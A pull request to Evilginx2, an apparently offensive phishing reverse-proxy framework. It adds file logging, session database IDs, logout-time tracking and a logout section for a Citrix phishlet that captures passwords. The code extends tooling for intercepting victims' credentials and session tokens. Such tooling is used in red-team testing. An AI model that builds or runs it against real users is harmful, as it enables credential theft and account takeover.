### PR TITLE
Logging to files

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -248,6 +248,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									p.extractParams(session, req.URL)
 
 									ps.Session = session
+									ps.Session.PhishLure = l
 									// tell method OnResponse to set Set-Cookie header
 									ps.Created = true
 

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -387,16 +387,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				req.Header.Set(string(hg), egg2)
 
 				// patch GET query params with original domains
-				if pl != nil {
-					qs := req.URL.Query()
-					if len(qs) > 0 {
-						for gp := range qs {
-							for i, v := range qs[gp] {
-								qs[gp][i] = string(p.patchUrls(pl, []byte(v), CONVERT_TO_ORIGINAL_URLS))
-							}
-						}
-						req.URL.RawQuery = qs.Encode()
-					}
+				if pl != nil && len(req.URL.RawQuery) > 0 {
+					req.URL.RawQuery = string(p.patchUrls(pl, []byte(req.URL.RawQuery), CONVERT_TO_ORIGINAL_URLS))
 				}
 
 				// check for creds in request body

--- a/core/session.go
+++ b/core/session.go
@@ -18,6 +18,8 @@ type Session struct {
 	IsForwarded   bool
 	RedirectCount int
 	PhishLure     *Lure
+	// maintains the internal database ID, which is sometimes reported in logging messages
+	Index         int
 }
 
 func NewSession(name string) (*Session, error) {
@@ -34,6 +36,7 @@ func NewSession(name string) (*Session, error) {
 		IsForwarded:   false,
 		RedirectCount: 0,
 		PhishLure:     nil,
+		Index:         0,
 	}
 	s.Tokens = make(map[string]map[string]*database.Token)
 

--- a/database/database.go
+++ b/database/database.go
@@ -64,6 +64,11 @@ func (d *Database) SetSessionTokens(sid string, tokens map[string]map[string]*To
 	return err
 }
 
+func (d *Database) SetSetLogoutTime(sid string) error {
+	err := d.sessionsSetLogoutTime(sid)
+	return err
+}
+
 func (d *Database) DeleteSession(sid string) error {
 	s, err := d.sessionsGetBySid(sid)
 	if err != nil {

--- a/database/database.go
+++ b/database/database.go
@@ -29,13 +29,18 @@ func NewDatabase(path string) (*Database, error) {
 	return d, nil
 }
 
-func (d *Database) CreateSession(sid string, phishlet string, landing_url string, useragent string, remote_addr string) error {
-	_, err := d.sessionsCreate(sid, phishlet, landing_url, useragent, remote_addr)
-	return err
+func (d *Database) CreateSession(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (int, error) {
+	id, err := d.sessionsCreate(sid, phishlet, landing_url, useragent, remote_addr)
+	return id, err
 }
 
 func (d *Database) ListSessions() ([]*Session, error) {
 	s, err := d.sessionsList()
+	return s, err
+}
+
+func (d *Database) GetSession(sid string) (*Session, error) {
+	s, err := d.sessionsGetBySid(sid)
 	return s, err
 }
 

--- a/database/db_session.go
+++ b/database/db_session.go
@@ -21,6 +21,7 @@ type Session struct {
 	SessionId  string                       `json:"session_id"`
 	UserAgent  string                       `json:"useragent"`
 	RemoteAddr string                       `json:"remote_addr"`
+	LogoutTime int64                        `json:"logout_time"`
 	CreateTime int64                        `json:"create_time"`
 	UpdateTime int64                        `json:"update_time"`
 }
@@ -56,6 +57,7 @@ func (d *Database) sessionsCreate(sid string, phishlet string, landing_url strin
 		SessionId:  sid,
 		UserAgent:  useragent,
 		RemoteAddr: remote_addr,
+		LogoutTime: 0,
 		CreateTime: time.Now().UTC().Unix(),
 		UpdateTime: time.Now().UTC().Unix(),
 	}
@@ -120,6 +122,18 @@ func (d *Database) sessionsUpdateCustom(sid string, name string, value string) e
 		return err
 	}
 	s.Custom[name] = value
+	s.UpdateTime = time.Now().UTC().Unix()
+
+	err = d.sessionsUpdate(s.Id, s)
+	return err
+}
+
+func (d *Database) sessionsSetLogoutTime(sid string) error {
+	s, err := d.sessionsGetBySid(sid)
+	if err != nil {
+		return err
+	}
+	s.LogoutTime = time.Now().UTC().Unix()
 	s.UpdateTime = time.Now().UTC().Unix()
 
 	err = d.sessionsUpdate(s.Id, s)

--- a/database/db_session.go
+++ b/database/db_session.go
@@ -37,10 +37,10 @@ func (d *Database) sessionsInit() {
 	d.db.CreateIndex("sessions_sid", SessionTable+":*", buntdb.IndexJSON("session_id"))
 }
 
-func (d *Database) sessionsCreate(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (*Session, error) {
+func (d *Database) sessionsCreate(sid string, phishlet string, landing_url string, useragent string, remote_addr string) (int, error) {
 	_, err := d.sessionsGetBySid(sid)
 	if err == nil {
-		return nil, fmt.Errorf("session already exists: %s", sid)
+		return -1, fmt.Errorf("session already exists: %s", sid)
 	}
 
 	id, _ := d.getNextId(SessionTable)
@@ -67,9 +67,9 @@ func (d *Database) sessionsCreate(sid string, phishlet string, landing_url strin
 		return nil
 	})
 	if err != nil {
-		return nil, err
+		return -1, err
 	}
-	return s, nil
+	return id, nil
 }
 
 func (d *Database) sessionsList() ([]*Session, error) {

--- a/main.go
+++ b/main.go
@@ -88,6 +88,15 @@ func main() {
 		return
 	}
 
+	// create log file
+	file, err := os.OpenFile(filepath.Join(config_path, "evilginx2.log"), os.O_RDWR | os.O_CREATE, 755)
+	if err == nil {
+		log.SetLogFile(file)
+		defer file.Close()
+	} else {
+		log.Error("failed opening log file")
+	}
+
 	crt_path := joinPath(*cfg_dir, "./crt")
 
 	if err := core.CreateDir(crt_path, 0700); err != nil {

--- a/phishlets/citrix.yaml
+++ b/phishlets/citrix.yaml
@@ -17,6 +17,9 @@ credentials:
     key: 'passwd'
     search: '(.*)'
     type: 'post'
+logout:
+  redirect_to: 'https://subdomainhere.domainhere/'
+  urls: ['^.*/Citrix/CDCTXSTOREWeb/Sessions/Disconnect$','^.*/Citrix/CDCTXSTOREWeb/Authentication/Logoff$','.*/Citrix/CDCTXSTOREWeb/logout.aspx$']
 login:
   domain: 'subdomainhere.domainhere'
   path: '/vpn/index.html'


### PR DESCRIPTION
Hey @kgretzky

This is a feature and extension to my previous PRs #531 and #532.
If users specify a config directory using Evilginx2's option `-c`, then this new functionality automatically logs all information that is printed to stdout to the log file `evilginx2.log`, which is located within the specified config directory. The purpose of this functionality is the persistent storage of the log information. This is especially useful is Evilginx2 is operated in a detached screen session or within a detached detached docker container.

Cheers
Chopicalqui